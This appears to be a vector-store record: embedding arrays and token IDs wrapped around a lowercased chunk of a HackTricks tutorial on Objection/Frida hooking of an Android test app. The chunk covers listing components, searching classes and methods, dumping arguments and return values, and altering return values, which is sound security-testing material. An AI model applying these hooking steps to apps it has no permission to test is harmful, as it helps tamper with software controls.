-0.18828184902668, -0.26900723576545715, -0.07201510667800903, -0.7965968251228333, 0.6367868781089783, -0.29573532938957214, -0.1990516185760498, 0.4820317327976227, -0.33525025844573975, 0.408983439207077, 0.3352102041244507, -0.29065757989883423, 0.6322636604309082, -0.4222716987133026, 0.11049269884824753, 0.24785247445106506, -0.7829716205596924, 0.6055765748023987, -0.026246245950460434, 0.29818907380104065, 0.3628074526786804, -0.3494856059551239, -0.3154449164867401, 0.2594943940639496, -0.0035189595073461533, -0.42050111293792725, -0.03381152078509331, -0.6297398805618286, -0.23950469493865967, -0.6728736758232117, 0.22309428453445435, -0.02540506236255169, 1.2178171873092651, 0.2687280774116516, 0.37084949016571045, -0.3762803077697754, 0.48625245690345764, 0.5537347793579102, -0.3699011504650116, 0.20407049357891083, 0.5885459780693054, 0.3631914258003235, -0.7233889698982239, -0.09220118820667267, 0.6053553819656372, -0.5422104597091675, 0.6563022136688232, -0.2984030544757843, 0.08638282865285873, 0.07014190405607224, 0.07368826866149902, 0.3113767206668854, 0.20975133776664734, 0.44948655366897583, -0.015092137269675732, 0.3315024673938751, -0.16124261915683746, -0.8062368035316467, 0.24966678023338318, -1.3115252256393433, -0.46533846855163574, 0.4765143394470215, -0.7512485980987549, -0.3668426275253296, -0.023379061371088028, 0.25618746876716614, 0.2727021276950836, 0.3547922670841217, -0.5562666654586792, 0.1269344687461853, 0.07213868200778961, -0.32984092831611633, 0.7105047106742859, -0.34535032510757446, -0.741866409778595, 0.02733868733048439, 0.3457174003124237, -0.21664400398731232, -1.3822311162948608, 0.4597734212875366, 0.7194241881370544, 0.3320106267929077, -0.18549112975597382, -0.3650414049625397, 0.3518935441970825, 0.4845099449157715, -0.11290909349918365, 0.2288738191127777, 0.5862303972244263, -0.38720548152923584, 0.882969856262207, -0.255548357963562, 0.2411353588104248, 0.04951469972729683, -0.39734816551208496, 0.13781225681304932, 0.2933507561683655, 0.03501419350504875, 0.32035884261131287, -0.3533395230770111, -0.4257243275642395, 0.8990247845649719, 0.11789833754301071, 0.4974476099014282, -0.7646301984786987, 0.46521899104118347, -0.05776458606123924, 0.5130225419998169, 0.31782469153404236, 0.2836477756500244, -0.13927507400512695, 0.5172824859619141, 0.7094590067863464, -0.4847242534160614, -0.23452924191951752, 0.5735132098197937, 0.11121506989002228, -0.3218366801738739, -0.35969969630241394, 0.22671106457710266, -0.07216954231262207, 0.09241468459367752, -0.45122194290161133, 0.009842888452112675, -0.2604771852493286, 0.20139291882514954, -0.13911375403404236, 0.08181415498256683, 0.4927723705768585, -0.4378705620765686, 0.8450204730033875, -0.10107824206352234, -0.5419094562530518, 0.3308303952217102, -0.1282174438238144, -0.6146952509880066, -0.09359609335660934, 0.7667609453201294, 0.2710857689380646, -0.18672536313533783, 0.869132399559021, -0.7399526834487915, 0.28852251172065735, 0.7706230878829956, -0.2516990602016449, -0.2276587039232254, -0.5980180501937866, 0.1736118197441101, -0.4644482731819153, -0.8500235080718994, 0.15907327830791473, -0.17500844597816467, -0.08321493119001389, 0.07353296130895615, -0.34985053539276123, -0.050719864666461945, -0.16807350516319275, -0.07268266379833221, -0.6165938377380371, 0.3628867566585541, 0.5073859095573425, -0.41154342889785767, -1.2749677896499634, 0.975409984588623, 0.3823848068714142, 0.4603232741355896, -0.34037044644355774, 1.3173394203186035, -0.3656076490879059, 0.787564218044281, -0.05550166219472885, -0.26037585735321045, -0.2673622667789459, 0.1998145878314972, -0.5565605163574219, -0.5119589567184448, -0.11221126466989517, -0.5419612526893616, 0.5437485575675964, -0.37327858805656433, -0.25271904468536377, -1.0168665647506714, 0.15886494517326355, -0.5350787043571472, -0.4458019733428955, 0.5067535638809204, -0.02075439691543579, -0.6098174452781677, 0.05288419499993324, 0.2257276177406311, 0.7330292463302612, 0.8419481515884399, -0.13990573585033417, -0.2811487317085266, -0.36191892623901367, -0.101065494120121, -0.5666506886482239, 0.7241768836975098, -0.1268669068813324, -0.1652059257030487, -0.4385823607444763, -0.7639294862747192, -0.35664018988609314, -0.14782872796058655, -0.2646833062171936, -0.5435355305671692, 0.3397637903690338, 0.10527227073907852, 0.6482569575309753, 0.5355469584465027, -0.24415193498134613, -0.39982175827026367, 0.33754387497901917, 0.8049834370613098, -0.19495834410190582, 0.5742454528808594, 0.3037433624267578, 0.3290160298347473, 0.3933125138282776, 0.2620581388473511, 0.7859629988670349, -0.7289155125617981, 0.22050175070762634, 0.13624432682991028, 0.13469845056533813, -0.5308253765106201, 0.003237407421693206, 0.09371484071016312, -0.4857790768146515, -0.8245121836662292, 0.5007736086845398, -0.8994264602661133, 0.019680138677358627, -1.0992212295532227, 0.003035259898751974, -0.43640097975730896, -0.3156510591506958, 0.0813751369714737, -0.3240495026111603, 0.7808306813240051, -0.8878195285797119, 4.409307479858398, 0.6056193113327026, -0.5151336193084717, -0.08654353022575378, 0.2453528195619583, 0.33513736724853516, 0.8334304690361023, -1.0185816287994385, 0.42310088872909546, -0.7924748659133911, -0.008489182218909264, -0.22928042709827423, 0.6221007704734802, 0.06896756589412689, 0.04977627471089363, 0.6541091203689575, -0.616638720035553, 0.4118059277534485, 0.9287149310112, -0.8321995735168457, -0.43929293751716614, 0.5115171074867249, 0.33034151792526245, 0.5791250467300415, 0.4113023281097412, 0.28810739517211914, 0.049796588718891144, -0.3972565531730652, 0.009548225440084934, -0.13210856914520264, 0.1684993952512741, -0.7504387497901917, -0.24399247765541077, -0.6365016102790833, -0.20273685455322266, 0.4650472104549408, 0.09076647460460663, 0.033557966351509094, 0.013696120120584965, 0.3362353444099426, 0.6004591584205627, 0.4865996837615967, -0.017640579491853714, -0.5808929204940796, 0.17351458966732025, 0.31058746576309204, -0.43677595257759094, 0.8961413502693176, 0.3627054691314697, -1.035747766494751, 0.7506580948829651, 0.00867407489567995, 1.1599029302597046, 0.299815833568573, -0.5186594724655151, 0.5978979468345642, 0.3111285865306854, -0.3953074514865875, -0.19739148020744324, 0.17247825860977173, 0.8742833733558655, -0.6603208780288696, 0.5984642505645752, -0.19376592338085175, -1.027557134628296, 0.4420934319496155, 0.018106115981936455, 0.23617713153362274, -0.044088635593652725, -0.023193076252937317, -0.45324811339378357, -0.20711566507816315, -0.5062901973724365, -0.43726590275764465, 0.7666243314743042, 0.47109919786453247, 0.4074125587940216, 0.3102150857448578, 0.739820659160614, -0.4165217876434326, 0.1993473321199417, -0.6302059888839722, -0.7333877086639404, 0.21098963916301727, 0.8908345699310303, 0.34204909205436707, -0.2165655493736267, -0.5097123980522156, -0.38141316175460815, 0.5025984048843384, 0.4655632972717285, 0.23681259155273438, 0.01874258928000927, 0.15737122297286987, -0.0716245025396347 ]
[ 101, 22224, 14924, 4818, 2890, 24063, 2121, 1011, 4236, 1011, 4955, 16429, 20614, 3258, 1011, 2448, 7292, 4684, 8993, 16429, 20614, 3258, 2003, 1037, 2448, 7292, 4684, 8993, 6994, 23615, 1010, 6113, 2011, 10424, 8524, 1012, 2009, 2001, 2328, 2007, 1996, 6614, 1997, 5094, 14358, 4684, 5097, 1998, 2037, 3036, 16819, 2302, 1996, 2342, 2005, 1037, 7173, 29162, 2030, 15685, 4684, 5080, 1012, 3602, 1024, 2023, 2003, 2025, 2070, 2433, 1997, 7173, 23890, 1013, 7117, 11826, 1012, 2011, 2478, 22224, 1010, 2017, 2024, 2145, 3132, 2011, 2035, 1997, 1996, 9259, 9770, 2011, 1996, 12711, 5472, 8758, 2017, 2024, 5307, 1012, 13746, 10760, 3125, 1997, 22224, 2003, 2292, 1996, 5310, 2655, 1996, 2364, 4506, 2008, 4107, 10424, 8524, 1012, 4728, 1010, 1996, 5310, 2097, 2342, 2000, 3443, 1037, 2309, 5896, 2005, 2296, 4646, 2008, 2002, 4122, 2000, 3231, 1012, 14924, 4818, 29278, 2023, 14924, 4818, 1045, 2572, 2183, 2000, 2224, 1996, 9706, 2243, 2008, 2017, 2064, 8816, 2182, 1024, 10439, 1011, 2713, 1012, 14101, 2475, 14905, 21114, 2854, 2953, 2013, 2049, 2434, 22409, 1006, 8816, 10439, 1011, 2713, 1012, 9706, 2243, 1007, 8272, 8197, 2361, 2509, 16500, 22224, 8663, 2638, 7542, 2863, 3489, 1037, 3180, 4748, 2497, 13171, 7542, 1998, 2707, 1996, 10424, 8524, 8241, 1999, 1996, 5080, 1006, 1998, 4638, 2008, 10424, 8524, 2003, 2551, 1999, 2119, 1996, 7396, 1998, 1996, 8241, 1007, 1012, 2065, 2017, 2024, 2478, 1037, 15685, 5080, 2009, 2003, 2734, 2000, 7276, 1996, 4646, 2008, 2017, 2215, 2000, 3231, 2503, 1996, 1011, 1011, 11721, 24291, 5724, 1012, 1999, 2023, 2553, 1024, 10424, 8524, 1011, 8827, 1011, 25423, 3695, 2497, 20614, 3258, 1011, 1011, 11721, 24291, 2004, 17258, 1012, 21025, 2705, 12083, 1012, 22834, 1012, 10424, 8524, 29098, 8849, 22083, 2594, 4506, 17048, 2035, 2825, 10954, 1997, 17304, 2024, 2183, 2000, 2022, 3205, 1999, 2023, 14924, 4818, 1010, 2069, 1996, 3924, 2008, 1045, 2031, 2179, 2062, 6179, 1012, 10058, 8462, 5875, 2592, 1006, 2066, 20786, 2015, 2030, 10425, 1007, 2071, 2022, 2424, 2503, 1996, 4044, 1012, 4372, 2615, 27439, 2050, 2592, 27439, 4887, 24759, 10441, 2094, 1013, 8816, 8873, 2571, 8816, 1026, 6556, 4130, 1028, 1031, 1026, 2334, 4130, 1028, 1033, 5371, 2039, 11066, 1026, 2334, 4130, 1028, 1031, 1026, 6556, 4130, 1028, 1033, 12324, 10424, 8524, 5896, 5714, 6442, 1026, 2334, 4130, 10424, 8524, 1011, 5896, 1028, 7020, 14277, 23111, 28234, 4859, 22943, 7020, 14277, 23111, 2075, 4487, 19150, 1001, 4740, 2000, 4487, 19150, 7020, 2140, 22866, 2006, 11924, 5733, 1012, 7117, 10788, 5685, 22943, 7117, 4487, 19150, 1001, 4740, 2000, 4487, 19150, 7117, 10788, 2006, 11924, 5733, 1012, 11924, 7117, 26633, 1001, 4740, 2000, 26633, 1037, 15685, 11924, 4044, 1012, 4654, 8586, 3094, 5685, 22943, 5806, 1035, 4654, 8586, 23281, 15630, 24410, 19040, 8791, 22196, 3593, 21318, 12117, 12326, 1013, 1056, 8737, 1013, 12117, 12326, 5685, 22943, 21318, 5210, 1035, 5851, 6270, 1001, 2023, 2089, 9585, 2017, 2000, 2202, 12117, 12326, 2015, 2478, 1996, 8051, 6309, 16677, 4106, 2081, 8790, 2378, 1037, 2613, 4646, 2057, 2323, 2113, 2035, 1997, 1996, 2592, 3603, 1999, 2023, 2112, 2077, 2478, 22224, 4283, 2000, 10763, 4106, 1012, 4312, 1010, 2023, 2126 ]
hack_tricks
429.txt
0
maybe you can see something new as here you will only have a complete list of classes, methods and exported objects. this is also usefull if somehow you are unable to get some readable source code of the app. list activities, receivers and servicesandroid hooking list activitiesandroid hooking list servicesandroid hooking list receiversfrida will launch an error if none is foundgetting current activityandroid hooking get current _ activitysearch classeslets start looking for classes inside our applicationandroid hooking search classes asvid. github. io. fridaappsearch methods of a classnow lets extract the methods inside the class mainactivity : android hooking search methods asvid. github. io. fridaapp mainactivitylist declared methods of a class with their parameterslets figure out wich parameters does the methods of the class need : android hooking list class _ methods asvid. github. io. fridaapp. mainactivitylist classesyou could also list all the classes that were loaded inside the current applicatoin : android hooking list classes # list all loaded classes, as the target application gets usedmore, this command will return more classes. this is very useful if you want to hook the method of a class and you only know the name of the class. you coul use this function to search which module owns the class and then hook its method. hooking being easyhooking ( watching ) a methodfrom the source code of the application we know that the function sum ( ) from mainactivity is being run every second. lets try to dump all possible information each time the function is called ( arguments, return value and backtrace ) : android hooking watch class _ method asvid. github. io. fridaapp. mainactivity. sum - - dump - args - - dump - backtrace - - dump - returnhooking ( watching ) an entire classactually i find all the methods of the class mainactivity really interesting, lets hook them all. be careful, this could crash an application. android hooking watch class asvid. github. io. fridaapp. mainactivity - - dump - args - - dump - returnif you play with the application while the class is hooked you will see when each function is being called, its arguments and the return value. changing boolean return value of a functionfrom the source code you can see
[ -0.08464524149894714, 0.16676761209964752, -0.3845003545284271, -0.13300330936908722, -0.3000449240207672, 0.04675240069627762, 0.27567124366760254, 0.2976578176021576, 0.44950079917907715, 0.3603063225746155, -0.12834642827510834, 0.14841294288635254, 0.30737996101379395, -0.26498883962631226, -0.4915983974933624, -0.16354891657829285, -0.31236106157302856, -0.10270857065916061, -1.3670530319213867, -0.006428754888474941, 0.3370923697948456, -0.0398801825940609, -0.6046568155288696, -0.949842095375061, -0.3803884983062744, 0.33999574184417725, 1.4648367166519165, 0.10835079848766327, 0.2737470865249634, 1.0963600873947144, 0.7008743286132812, -0.00007148017175495625, 0.29509150981903076, -0.6990436911582947, 0.10988466441631317, -0.11051374673843384, 0.5159017443656921, -0.9495990872383118, 0.43797990679740906, -1.0090750455856323, 0.2906839847564697, -0.4735059142112732, 0.2690013647079468, -0.67762690782547, 0.09117884188890457, 0.01674903742969036, 0.07963787764310837, -0.6748557090759277, 0.44089290499687195, -0.41538235545158386, 0.5121521949768066, 0.6548465490341187, 0.037123072892427444, 0.03696441277861595, 0.54481440782547, 0.3580688536167145, -0.33531680703163147, 0.3703967332839966, -0.6759365200996399, -0.14770229160785675, -0.08993524312973022, 0.8327218890190125, 0.10546043515205383, -1.1337289810180664, -0.047598741948604584, 0.692755937576294, 0.4525440037250519, -0.3749009072780609, 0.15901575982570648, -0.6078240871429443, -0.8307440876960754, 0.5268422961235046, -0.18663421273231506, -0.27675023674964905, -0.8471461534500122, 0.03130368888378143, -0.4753601849079132, -0.001390527468174696, -0.007796073332428932, 0.10784322768449783, 0.3538930118083954, 0.31242355704307556, -0.6974323987960815, 0.13732333481311798, -0.5809672474861145, -0.7029621601104736, 0.09209788590669632, 0.6888667345046997, -0.977506160736084, 0.49561193585395813, 0.3568360507488251, 0.5190402865409851, -0.24699190258979797, -0.22741873562335968, 0.8353433012962341, 0.5685224533081055, -0.16150926053524017, 0.15815424919128418, 0.36864322423934937, -0.511962354183197, 1.156486988067627, 0.7677274942398071, -0.3779207468032837, 0.027866393327713013, -0.15553024411201477, 0.24635590612888336, -0.34023523330688477, 0.1401195377111435, -0.1052229031920433, -0.5686210989952087, 0.027264121919870377, 0.3949859142303467, 0.10548962652683258, -1.105259895324707, 0.07152801752090454, 0.5372931361198425, 0.5658880472183228, -0.1560894250869751, -0.16761311888694763, 0.8181630373001099, 0.12199728190898895, 0.11078215390443802, 0.2245301455259323, -0.3745567202568054, 0.09552133083343506, 0.17824238538742065, 0.27047839760780334, 1.0160962343215942, -0.07502052187919617, 0.29022160172462463, -0.41283339262008667, -0.3477693200111389, -1.1915993690490723, 0.42506542801856995, -0.4988695979118347, -0.3576611280441284, -0.33824482560157776, 0.3346543610095978, 0.7680376172065735, -1.140509009361267, 0.45134297013282776, -0.21383501589298248, 0.09637077897787094, 1.1634109020233154, 0.4011044204235077, 0.20683713257312775, -0.5581449866294861, -0.1554318517446518, -0.3295227885246277, -0.1250210851430893, -0.16985301673412323, -0.1990073323249817, 0.9236166477203369, -0.378493070602417, -0.3100167214870453, -0.31508979201316833, -0.4495847821235657, 0.5804010629653931, 0.022490154951810837, -0.3009701669216156, -0.331932008266449, 0.5799320936203003, -0.10817499458789825, 0.4590752124786377, -0.16623146831989288, 0.3366115689277649, -0.41735997796058655, -0.13020938634872437, -0.02215181663632393, 0.06174539402127266, 0.42296940088272095, -0.2953770160675049, -0.004037715960294008, 0.2456359565258026, 1.7618658542633057, 0.8593202233314514, -0.12542200088500977, -0.011154398322105408, 0.005785753019154072, 0.6866711378097534, -0.7217663526535034, -0.33180704712867737, 0.06051718443632126, 0.7029962539672852, -0.06746865808963776, 0.11433787643909454, -0.08572884649038315, -0.8457178473472595, -0.09452719241380692, 0.005347912199795246, 0.028503747656941414, 0.5958675146102905, -0.6085541248321533, 0.10316333174705505, 0.7297048568725586, 0.15118616819381714, -0.9198094606399536, -0.17090751230716705, -0.47232043743133545, -0.929877519607544, -0.6688721776008606, 0.898856520652771, -0.007603992708027363, 0.729377031326294, -0.32546529173851013, -0.09283902496099472, 1.0899782180786133, 0.7335904836654663, -0.5173593163490295, 0.5995973348617554, 0.5666772723197937, -0.5009015202522278, -0.4569252133369446, 0.40078499913215637, 0.12210274487733841, 0.030685489997267723, -0.7104652523994446, 0.32274726033210754, -0.261046439409256, -0.011531518772244453, 0.3832739293575287, 1.2221717834472656, 0.22459083795547485, -0.09860363602638245, -0.35325878858566284, -0.24288368225097656, -0.10079978406429291, 0.5002264976501465, -0.0651727244257927, -0.14691464602947235, -0.1178300604224205, 0.7360851764678955, 0.250544935464859, 0.3655148148536682, 0.07242932915687561, -0.5501899719238281, 0.02606523595750332, 0.529079258441925, 0.17773649096488953, -0.45975935459136963, -0.41179266571998596, 0.8888338804244995, 0.6790708303451538, 0.5188499689102173, 0.22311824560165405, 0.6403934955596924, 0.040922701358795166, -0.26991140842437744, 0.287926584482193, 1.029593825340271, 0.09918664395809174, 1.1733251810073853, 0.24395236372947693, -0.4688347578048706, -0.34725895524024963, -0.6585901975631714, 0.0081747155636549, 1.1728755235671997, -0.45490118861198425, -0.729379415512085, -0.0008125028107315302, -0.035374440252780914, -0.043642815202474594, -0.13355191051959991, 0.2483971118927002, 0.5501654744148254, -0.0621868334710598, 0.15325047075748444, -0.35266798734664917, -1.1877906322479248, -0.8796351552009583, -0.6773245334625244, -1.0401747226715088, -0.4406842887401581, -0.1794988214969635, 0.0812741219997406, -0.09166500717401505, -0.15530447661876678, 0.6928209066390991, -0.15541885793209076, -0.7853345274925232, 0.08904869109392166, -0.1133522167801857, 0.6475628018379211, 0.3230455815792084, 0.004480951465666294, -0.38914793729782104, 0.17371363937854767, -0.30473268032073975, 0.21329675614833832, -0.6290879845619202, -0.061835356056690216, 0.02437904104590416, 0.10591845959424973, 0.2600136697292328, 0.1691163033246994, 0.6656243205070496, -0.5046138167381287, -0.21131952106952667, -0.37170296907424927, -0.41411566734313965, -0.2868165373802185, 0.404365211725235, 0.8019536733627319, 0.45067933201789856, 0.9129924774169922, -0.4556301236152649, -0.5524887442588806, 0.7773304581642151, 0.2675305902957916, -0.9121940732002258, 0.42900797724723816, 0.11338699609041214, 0.14388404786586761, -0.975807785987854, 0.10628095269203186, 0.22987523674964905, 0.36982688307762146, -0.19207990169525146, -0.26622530817985535, -0.06903737783432007, -0.3651154339313507, 0.26706063747406006, 0.315567284822464, -0.27843549847602844, 0.651658296585083, 0.2371198982000351, -0.7840594053268433, 0.4837720990180969, -0.1855849325656891, -0.39847975969314575, -0.4814780354499817, -0.758457362651825, 0.0760035440325737, 0.372394859790802, 0.5263077616691589, 0.29055434465408325, 0.0788596048951149, -0.18631744384765625, -0.5712110996246338, 0.20409102737903595, -0.4361485242843628, 0.6433488726615906, -0.014092403464019299, 0.18861353397369385, 0.5151138305664062, -0.18001176416873932, -0.5668496489524841, -0.18041715025901794, -0.13492602109909058, -0.36906278133392334, 0.19074216485023499, 0.39292535185813904, 0.8511692881584167, 0.07371197640895844, 0.7098071575164795, -0.23192037642002106, -0.2536245584487915, -0.09739474952220917, 0.3033890426158905, 0.34814053773880005, -0.31584906578063965, 0.2217666059732437, -0.16394828259944916, -0.6443895697593689, -0.3434712588787079, 0.3630925416946411, -0.20206400752067566, 0.5630820989608765, -0.4740016758441925, 1.0857715606689453, -0.03872522711753845, -0.1843276172876358, 0.37634700536727905, -0.6735705137252808, -0.6221605539321899, 1.0176786184310913, -0.2293386608362198, 1.0081050395965576, -0.19900968670845032, 0.15062853693962097, -0.6177799701690674, -0.4069559574127197, 0.06371226906776428, 0.38471341133117676, -0.15159134566783905, -0.3004884421825409, 0.06883145868778229, -0.23263970017433167, 0.04835544899106026, -0.27968114614486694, 0.2186644822359085, 0.32233455777168274, -0.8901114463806152, 0.026272930204868317, -0.37197840213775635, 0.9100221991539001, 0.9171444177627563, 0.3381490111351013, -0.13701428472995758, 0.1498662680387497, -0.23098012804985046, -0.08963187783956528, 0.3756588101387024, -0.9557088017463684, 0.6932721734046936, -0.7518727779388428, 0.7463428974151611, 0.18094700574874878, -0.18712125718593597, -0.30992648005485535, -0.3019266724586487, -0.23793166875839233, -0.12825846672058105, 0.29166555404663086, -0.17056702077388763, -0.4931945502758026, -0.4447155296802521, 0.11341238766908646, 0.2532832622528076, 0.03982770815491676, 0.006637834943830967, -0.12801988422870636, 0.8434608578681946, 0.10460548847913742, -0.10248299688100815, -0.3958701491355896, -0.6746705770492554, 0.28845247626304626, 0.5265198349952698, -0.11779824644327164, -0.4002635180950165, -0.546944797039032, -0.2409449815750122, -0.528975248336792, 0.0020467862486839294, 0.30024582147598267, 0.482074111700058, -0.0702597051858902, -0.9726324677467346, 0.23234884440898895, 0.5248327851295471, -0.1338229924440384, -0.0822133868932724, -0.11486274749040604, 0.5238766670227051, 0.05512057617306709, -0.055002275854349136, -0.0886763483285904, -0.17950205504894257, 0.14852626621723175, -0.8531362414360046, 0.4263676106929779, -0.5166180729866028, 0.5361571907997131, 0.288743257522583, 0.011355445720255375, -0.5620232224464417, 0.42988142371177673, -0.022265484556555748, 0.12415938079357147, -0.8103651404380798, 0.4997841417789459, -0.24087120592594147, -0.26062408089637756, 1.0396668910980225, 0.15198077261447906, 0.0594186931848526, 0.3833708167076111, 0.13983502984046936, -0.428885817527771, -0.20182497799396515, -0.032826993614435196, -0.3664070665836334, 0.4159514605998993, -0.9280763268470764, 0.2616264522075653, 0.34603244066238403, -0.06827083230018616, 0.03215450793504715, -0.4975259602069855, 0.732381284236908, 0.10074486583471298, 0.17614439129829407, -1.062056064605713, -0.5090694427490234, -0.41322195529937744, -0.002235936699435115, -0.3090716302394867, 0.40318411588668823, -0.2345849722623825, -0.5620387196540833, -0.39619919657707214, -0.3373871147632599, 0.06043027713894844, -0.4439831078052521, 0.04572075977921486, -0.5424309968948364, 0.10639654844999313, -0.20998071134090424, 1.0163992643356323, 0.034234669059515, -0.3377860188484192, -0.16679596900939941, -0.31933653354644775, -0.014622429385781288, -0.7693063616752625, -0.20817531645298004, -0.6463315486907959, -0.2846320569515228, -0.025488924235105515, -0.18008527159690857, 0.04595204442739487, -0.43854162096977234, 0.19421091675758362, -0.002089099260047078, 1.1436396837234497, -0.1730954945087433, -0.6171162724494934, 0.6245537996292114, 0.257632851600647, -0.32559725642204285, -0.2624377906322479, 0.49847644567489624, 0.1358794867992401, -0.024519968777894974, 0.17285194993019104, 0.06186910718679428, -0.6758113503456116, -0.9912415146827698, -0.08543583005666733, 0.023760104551911354, 0.47225648164749146, -1.0061619281768799, -0.3354460299015045, -0.4143979251384735, 0.285686731338501, 0.16035795211791992, -0.6856421232223511, -0.06794163584709167, 0.11703654378652573, 0.2851415276527405, -0.18866248428821564, 0.07040122151374817, -0.6155431866645813, -0.07524167001247406, -0.21487164497375488, 0.6432790160179138, 0.1511484831571579, 0.20492897927761078, -0.04206617921590805, 0.2534434199333191, 0.13708485662937164, -0.04996126890182495, -0.8585209846496582, -0.3379249572753906, 0.15486496686935425, -0.08905789256095886, -0.3377414345741272, 1.0317953824996948, -0.40114134550094604, 0.658201277256012, -0.32585275173187256, -0.310903400182724, 0.09633877873420715, 0.13812355697155, 0.16515062749385834, -0.2900993227958679, 0.40124085545539856, -0.6875420808792114, -0.20245389640331268, -0.12261693179607391, 0.6283069849014282, 0.35730695724487305, -0.9468823671340942, -1.1996783018112183, 0.16927917301654816, -0.6050915718078613, -0.4805402159690857, 0.16438604891300201, -0.2602745294570923, 0.18542654812335968, 0.3796221613883972, 0.3814755976200104, 1.001173973083496, -0.5078368782997131, 0.6595360636711121, 0.7278398275375366, 0.23052367568016052, 0.5568711161613464, -0.2812027633190155, 0.739599883556366, 0.2347286194562912, 0.0573091022670269, -0.07149510830640793, -0.11406256258487701, 0.28775298595428467, -0.022486409172415733, -0.3985782563686371, -1.1107969284057617, -0.426647812128067, -0.22288109362125397, 0.7860421538352966, 0.21903793513774872, 0.31010740995407104, -0.17610470950603485, -0.8298746347427368, -0.2219202220439911, -0.13726520538330078, -0.3815195858478546, 0.06093102693557739, 0.7981109619140625, 0.44308069348335266, -0.20502349734306335, -0.13534195721149445, -0.0742773562669754, -0.19634737074375153, 0.05973917990922928, 0.8637533783912659, -0.3954448103904724, -0.6215819716453552, 0.1809186339378357, 0.6877946853637695, -0.34367915987968445, 0.36417829990386963, -0.5392871499061584, -0.5002159476280212, -0.616874635219574, -0.7264063954353333, -0.29377973079681396, -0.2143900841474533, 0.1142948791384697, 0.2321956902742386, 0.7900878190994263, -0.7651398181915283, -0.008041005581617355, -0.34926366806030273, -0.12262279540300369, 0.33189550042152405, 0.23322829604148865, 0.6464970707893372, -0.7541297078132629, -0.1501639485359192, -0.267943412065506, 0.17744819819927216, 0.08335278928279877, -0.42074817419052124, 0.6247523427009583, -0.2428034543991089, 0.3577735126018524, 0.1659516841173172, -0.35769790410995483, 0.5693969130516052, -0.4502388536930084, -0.09043660014867783, 0.7620738744735718, -0.17249947786331177, -0.780114471912384, -0.28341618180274963, 0.29167449474334717, 0.522483229637146, 0.2387198805809021, 0.14179913699626923, -0.11277379840612411, -0.06710802763700485, 0.42709147930145264, -0.1538768857717514, -0.7875086665153503, -0.7168828845024109, -0.9387389421463013, -0.48382535576820374, -0.06875087320804596, -0.1839333474636078, 0.004979332443326712, -0.13733620941638947, -0.31377917528152466, -0.622413158416748, -0.10136282444000244, 0.4289257824420929, -0.5870807766914368, 0.2880271375179291, -0.6842378377914429, 0.2491486817598343, -0.2547345459461212, -0.8095495700836182, -0.4917786419391632, 0.12923108041286469, -0.189511239528656, -0.31105560064315796, -0.38487422466278076, 0.20405429601669312, -0.49817362427711487, 0.2754386365413666, -0.7293463349342346, 0.040432244539260864, 0.0335279181599617, -0.36490923166275024, -0.21602389216423035, 0.5726423263549805, 0.17265653610229492, 0.7278075814247131, -0.42647498846054077, -0.14784720540046692, -0.05805710330605507, -0.2731419503688812, -0.39886361360549927, -0.06203869357705116, 0.267202228307724, 0.1431283801794052, -0.19561922550201416, -0.31155475974082947, 0.2467929869890213, 0.08061698824167252, -0.7993394136428833, -0.2947721779346466, -0.25896745920181274, 0.0944373682141304, -0.056321822106838226, -0.3267664611339569, 0.8216392397880554, 0.9547922611236572, 0.6259127259254456, 0.439959317445755, -0.8188450932502747, 0.4784402847290039, 0.2123529016971588, 0.4499666094779968, 0.21987204253673553, 0.3675982654094696, 0.3756338953971863, -0.14226378500461578, 0.007416263222694397, 0.13736014068126678, -0.7012383937835693, 0.24270860850811005, -0.27494218945503235, 0.05471225827932358, -0.5556276440620422, 0.18070928752422333, 0.23786340653896332, 0.6085841059684753, 0.02914062701165676, -0.7086865901947021, -0.371060311794281, -0.18610405921936035, -0.36390891671180725, 0.01729615405201912, -0.8445611000061035, -0.4108829200267792, 0.18874093890190125, -0.30582714080810547, -0.5666513442993164, -0.124252088367939, -0.18643444776535034, -0.1982327550649643, 0.29099151492118835, -0.40055036544799805, 0.4785328209400177, 0.31699708104133606, -0.2382316142320633, 0.35451188683509827, -0.5378143191337585, -0.7080609798431396, -0.06340958923101425, 0.5210463404655457, -0.40638062357902527, -1.1851023435592651, 0.36983081698417664, 0.2926400899887085, 0.2899915277957916, 0.21553878486156464, 0.012286581099033356, 0.0370204821228981, 0.020525064319372177, 1.006007432937622, 0.048216287046670914, 0.1183791384100914, -0.868408739566803, 0.7267743349075317, -0.33037328720092773, -0.0264972522854805, 0.1702633798122406, 0.01011599600315094, 0.33396419882774353, -0.09794400632381439, -0.5531001091003418, 0.5594093799591064, 0.17584288120269775, 0.5240586400032043, 0.7987179756164551, 0.23887790739536285, 0.47726887464523315, -0.3951692581176758, -0.09079927206039429, -0.29340699315071106, 0.2807099223136902, -0.3435983657836914, 0.06813830882310867, 0.12418410181999207, 0.0556974820792675, 0.3459034562110901, -0.14408883452415466, -0.219929501414299, 0.9494248032569885, 0.1565164178609848, -0.12151794880628586, 0.22341236472129822, 0.1529584378004074, -0.023693431168794632, 0.7752362489700317, -0.2899826765060425, 0.8804109692573547, -0.17710000276565552, -0.17386218905448914, -0.14121347665786743, 0.32981622219085693, 0.8495499491691589, -0.6962835788726807, 0.24364933371543884, -0.08279728144407272, -0.2239212691783905, 0.3981158137321472, -0.23459084331989288, -0.047473229467868805, 0.30163952708244324, 1.3280677795410156, 0.14724279940128326, 0.13312774896621704, 0.4272485077381134, -0.0594215989112854, 0.523034930229187, -0.005721761379390955, -0.22742332518100739, -0.31248804926872253, 0.19669359922409058, 0.3639969527721405, -1.231863260269165, -0.12283242493867874, 0.12760156393051147, 0.16225050389766693, -0.28976970911026, 0.34555187821388245, -0.2039041519165039, 0.06247304007411003, -0.14077147841453552, 0.19121097028255463, -0.40276262164115906, 0.45113906264305115, 0.4084901213645935, -0.330932080745697, -0.6792740225791931, 0.9762173891067505, 0.015154685825109482, 0.2683975398540497, 0.24040153622627258, 0.575123131275177, -0.054170217365026474, 0.099164217710495, 0.1039731502532959, -0.311592698097229, -0.5835293531417847, 0.07037796825170517, 0.15296608209609985, -0.15904971957206726, 0.32627537846565247, -0.04113614931702614, 0.7990260124206543, -0.02824842743575573, -0.4435631036758423, -0.1160767525434494, 0.04762114956974983, -0.3175104558467865, -0.13956545293331146, 0.49182215332984924, 0.08110802620649338, -0.18076832592487335, -0.12811456620693207, 0.2736373543739319, 0.20704111456871033, 0.48397037386894226, -0.0172329880297184, -0.3544919490814209, -0.6561274528503418, -0.5253282785415649, -0.6177065372467041, 1.4576361179351807, -0.7610830068588257, -0.35695767402648926, -0.18242710828781128, -0.6296737194061279, -0.2769152820110321, -0.1170484647154808, -0.20116528868675232, -0.9372890591621399, 0.38323289155960083, 0.3579263687133789, 0.38337910175323486, 